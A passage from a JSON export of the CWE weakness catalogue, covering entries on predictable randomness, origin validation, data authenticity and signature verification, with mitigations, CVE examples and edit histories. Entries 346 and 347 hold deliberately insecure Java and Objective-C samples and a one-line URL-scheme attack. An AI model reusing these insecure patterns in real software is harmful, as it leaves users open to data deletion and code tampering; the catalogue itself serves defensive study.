cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"343":{"attr":{"@_ID":"343","@_Name":"Predictable Value Range from Previous Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software\'s random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated.","Extended_Description":"The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker cannot predict the exact value that will be produced next, but can narrow down the possibilities significantly. This reduces the amount of effort to perform a brute force attack. For example, suppose the product generates random numbers between 1 and 100, but it always produces a larger value until it reaches 100. If the generator produces an 80, then the attacker knows that the next value will be somewhere between 81 and 100. Instead of 100 possibilities, the attacker only needs to consider 20.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Value Range from Previous Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-320"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"344":{"attr":{"@_ID":"344","@_Name":"Use of Invariant Value in Dynamically Changing Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a constant value, name, or reference, but this value can (or should) vary across different environments.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0980","Description":"Component for web browser writes an error message to a known location, which can then be referenced by attackers to process HTML/script in a less restrictive context","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0980"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Static Value in Unpredictable Context"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-267"}}},"Notes":{"Note":{"#text":"overlaps default configuration.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Static Value in Unpredictable Context","attr":{"@_Date":"2008-04-11"}}}},"345":{"attr":{"@_ID":"345","@_Name":"Insufficient Verification of Data Authenticity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Verification of Data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":12,"Entry_Name":"Content Spoofing"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"148"}},{"attr":{"@_CAPEC_ID":"218"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"665"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 15: Not Updating Easily." Page 231"}}},"Notes":{"Note":[{"#text":"\\"origin validation\\" could fall under this.","attr":{"@_Type":"Relationship"}},{"#text":"The specific ways in which the origin is not properly identified should be laid out as separate weaknesses. In some sense, this is more like a category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Insufficient Verification of Data","attr":{"@_Date":"2008-04-11"}}}},"346":{"attr":{"@_ID":"346","@_Name":"Origin Validation Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify that the source of data or communication is valid.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Varies by Context"],"Note":"An attacker can access any functionality that is inadvertently accessible to the source."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-112"},"Intro_Text":"This Android application will remove a user account when it receives an intent to do so:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.RemoveUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class DeleteReceiver extends BroadcastReceiver {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"int userID = intent.getIntExtra(\\"userID\\");destroyUserData(userID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1218","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218"},{"Reference":"CVE-2005-0877","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877"},{"Reference":"CVE-2001-1452","Description":"DNS server caches glue records received from non-delegated name servers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452"},{"Reference":"CVE-2005-2188","Description":"user ID obtained from untrusted source (URL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2188"},{"Reference":"CVE-2003-0174","Description":"LDAP service does not verify if a particular attribute was set by the LDAP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0174"},{"Reference":"CVE-1999-1549","Description":"product does not sufficiently distinguish external HTML from internal, potentially dangerous HTML, allowing bypass using special strings in the page title. Overlaps special elements.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1549"},{"Reference":"CVE-2003-0981","Description":"product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Origin Validation Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"160"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"510"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"75"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"89"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-324"}}},"Notes":{"Note":[{"#text":"This entry has some significant overlap with other CWE entries and may need some clarification. See terminology notes.","attr":{"@_Type":"Maintenance"}},{"#text":"The \\"Origin Validation Error\\" term was originally used in a 1995 thesis [REF-324]. Although not formally defined, an issue is considered to be an origin validation error if either (1) \\"an object [accepts] input from an unauthorized subject,\\" or (2) \\"the system [fails] to properly or completely authenticate a subject.\\" A later section says that an origin validation error can occur when the system (1) \\"does not properly authenticate a user or process\\" or (2) \\"does not properly authenticate the shared data or libraries.\\" The only example provided in the thesis (covered by OSVDB:57615) involves a setuid program running command-line arguments without dropping privileges. So, this definition (and its examples in the thesis) effectively cover other weaknesses such as CWE-287 (Improper Authentication), CWE-285 (Improper Authorization), and CWE-250 (Execution with Unnecessary Privileges). There appears to be little usage of this term today, except in the SecurityFocus vulnerability database, where the term is used for a variety of issues, including web-browser problems that allow violation of the Same Origin Policy and improper validation of the source of an incoming message.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Maintenance_Notes, References, Relationship_Notes, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Terminology_Notes"}]}},"347":{"attr":{"@_ID":"347","@_Name":"Improper Verification of Cryptographic Signature","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not verify, or incorrectly verifies, the cryptographic signature for data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality"],"Impact":["Gain Privileges or Assume Identity","Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could gain access to sensitive data and possibly execute unauthorized code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code, a JarFile object is created from a downloaded file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"File f = new File(downloadedFilePath);JarFile jf = new JarFile(f);","xhtml:br":""}},"Body_Text":"The JAR file that was potentially downloaded from an untrusted source is created without verifying the signature (if present). An alternate constructor that accepts a boolean verify parameter should be used instead."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1796","Description":"Does not properly verify signatures for \\"trusted\\" entities.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1796"},{"Reference":"CVE-2005-2181","Description":"Insufficient verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181"},{"Reference":"CVE-2005-2182","Description":"Insufficient verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182"},{"Reference":"CVE-2002-1706","Description":"Accepts a configuration file without a Message Integrity Check (MIC) signature.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1706"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Verified Signature"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"475"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content 